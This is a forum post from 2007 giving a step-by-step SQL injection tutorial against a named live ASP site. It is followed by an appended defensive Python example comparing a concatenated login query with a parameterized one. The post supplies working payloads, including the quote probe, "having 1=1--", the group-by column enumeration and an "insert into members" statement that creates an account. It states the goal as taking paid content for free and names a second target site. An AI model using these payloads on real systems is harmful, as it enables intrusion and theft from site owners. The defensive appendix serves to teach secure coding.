nova (BANNED) - Jul 23, 2007
OK boys and girls. Here is how you can hack some sites using a method called SQL injection.
Now as you all know, sites use databases to store their users' information. SQL Server from Microsoft is one of the popular databases and 99% of the times the sites using this database are coded in a language called ASP.
The pages on such a site end with the extension .asp
The first test we need to do is to find a form on such a site, say for example a login form. Now our objective is to create an account on such a site.
I'll take a case study. Just today I got an email from an internet marketer promoting this.
I mailed him about this vulnerability but he hasn't responded, so I guess he's not bothered about this... oh well...
http://www.adsalternative.com/index.asp
So we go to the members login page
http://www.adsalternative.com/members/login.asp
BIG mistake letting people know the login page to the members area.
Now we enter the
Code:
'
character in the username field. We get this message.
"Please ensure that you enter both your Username and your Password in order to log in to the members' area"
Which means that he's validating both the username and password.
So let's enter ' in both the fields and press login.
Which returns this error
Code:
"Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'ds'.
/includes/databaseconnect.asp, line 21 "
Which means that his ASP script isn't checking for the ' character, and this is the basis of this exploit.
Now we type
' having 1=1-- into the user name and ' into the password and press login
Which returns us this error
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21
So now we know that his table name is members and his first column is id.
Now we use a "group by" SQL clause to find out the other column names
So we type the user name as ' group by users.id having 1=1--
and ' as the password and press login,
which returns the error
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21
So we know his next column is emailAddress.
Continuing in this manner, grouping by each column name, we get his whole table structure.
Once we have that, all we need to do is insert a record with our name.
So in the username field we enter
Code:
'; insert into members(username,password) values('jack', 'hack')--
and in the password field we enter
Code:
'
and press login
This has created us an account with the username jack and the password hack.
Now we can login with this username and password and download all his shite for free
Another example of poor site protection :nutkick:
So mods does this qualify for the VIP access
http://tubeautomator.com/squeeze.php
'
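Added example, not code from the poster or from the site he describes: a small Python/sqlite3 model of the two things the post relies on, a login query built by string concatenation and a page that echoes the database engine's error text. The table name and the column names `id`, `emailAddress`, `username`, `password` are taken from the error messages quoted above; the schema, the sample member row and the function names are constructed for the demo, and sqlite3 stands in for SQL Server. The hardened version uses a parameterized query and returns a generic message instead of the engine error, which removes both the injection and the schema leak.

```python
import sqlite3

# Constructed demo schema (not the real site's): the table and columns named
# in the post's error messages, plus one sample member row. Plaintext
# passwords are kept only to mirror the post; real systems store a hash.
SCHEMA = """
CREATE TABLE members (
    id INTEGER PRIMARY KEY,
    emailAddress TEXT,
    username TEXT NOT NULL,
    password TEXT NOT NULL
);
INSERT INTO members (emailAddress, username, password)
VALUES ('alice@example.invalid', 'alice', 'correct horse');
"""


def make_db():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the post exploits: user input pasted into the SQL text.

    Returns (logged_in, message). On any database error the raw engine
    message is handed back to the page, which is what let the poster read
    the table and column names out of the error text.
    """
    sql = ("SELECT id FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return False, "Database error: " + str(exc)  # leaks engine error text
    return (row is not None), ("ok" if row else "invalid credentials")


def login_safe(conn, username, password):
    """Hardened version: a parameterized query plus a generic error message.

    The driver sends the input as bound values, never as part of the SQL
    text, so a quote in the input cannot alter the statement. Any database
    error is logged server-side (omitted here) and the user sees nothing
    about the schema.
    """
    sql = "SELECT id FROM members WHERE username = ? AND password = ?"
    try:
        row = conn.execute(sql, (username, password)).fetchone()
    except sqlite3.Error:
        return False, "login failed"  # no engine text reaches the page
    return (row is not None), ("ok" if row else "invalid credentials")


def probe_leaks_error(login, conn):
    """The post's first test, used here as a self-check for the defender:
    a lone quote in the username. A handler that answers with the engine's
    own error text is concatenating input into SQL and exposing its schema.
    The password value is an arbitrary constructed string."""
    ok, msg = login(conn, "'", "test")
    return (not ok) and msg.startswith("Database error:")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks engine error:", probe_leaks_error(login_vulnerable, db))
    print("parameterized handler leaks engine error:", probe_leaks_error(login_safe, db))
    print("valid login through parameterized handler:", login_safe(db, "alice", "correct horse"))
```

Running the block shows the concatenating handler failing the quote probe with an engine error while the parameterized handler simply reports invalid credentials; the check is a cheap regression test to keep in a login handler's test suite so the leak cannot quietly return.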